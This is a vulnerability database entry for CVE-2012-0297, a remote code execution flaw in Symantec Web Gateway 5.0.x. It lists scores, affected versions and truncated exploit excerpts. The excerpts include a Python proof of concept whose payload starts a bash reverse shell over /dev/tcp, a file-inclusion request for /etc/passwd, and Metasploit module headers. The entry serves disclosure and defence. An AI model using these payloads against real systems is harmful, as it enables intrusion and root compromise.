10
CVSSv2

CVE-2012-0297

Published: 21/05/2012 Updated: 05/12/2017
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

The management GUI in Symantec Web Gateway 5.0.x prior to 5.0.3 does not properly restrict access to application scripts, which allows remote malicious users to execute arbitrary code by (1) injecting crafted data or (2) including crafted data.

Vulnerable Product Search on Vulmon Subscribe to Product

symantec web gateway 5.0.1

symantec web gateway 5.0

symantec web gateway 5.0.2

Exploits

Symantec Web Gateway version 5028 suffers from local file inclusion, remote command execution, and arbitrary file deletion vulnerabilities ...
#!/usr/bin/python # Symantec Web Gateway 502 Remote LFI root Exploit Proof of Concept # Exploit requires no authentication, /tmp/networkScript is sudoable and apache writable # muts at offensive-security dot com import socket import base64 payload= '''echo '#!/bin/bash' > /tmp/networkScript; echo 'bash -i >& /dev/tcp/172161641/1 ...
Software: Symantec Web Gateway Current Software Version: 5028 Product homepage: wwwsymanteccom Author: S2 Crew [Hungary] CVE: CVE-2012-0297, CVE-2012-0298, ??? File include: 19216882207/spywall/previewProxyErrorphp?err=////////etc/passwd File include and OS command execution: 19216882207/ ...
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking ...
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking ...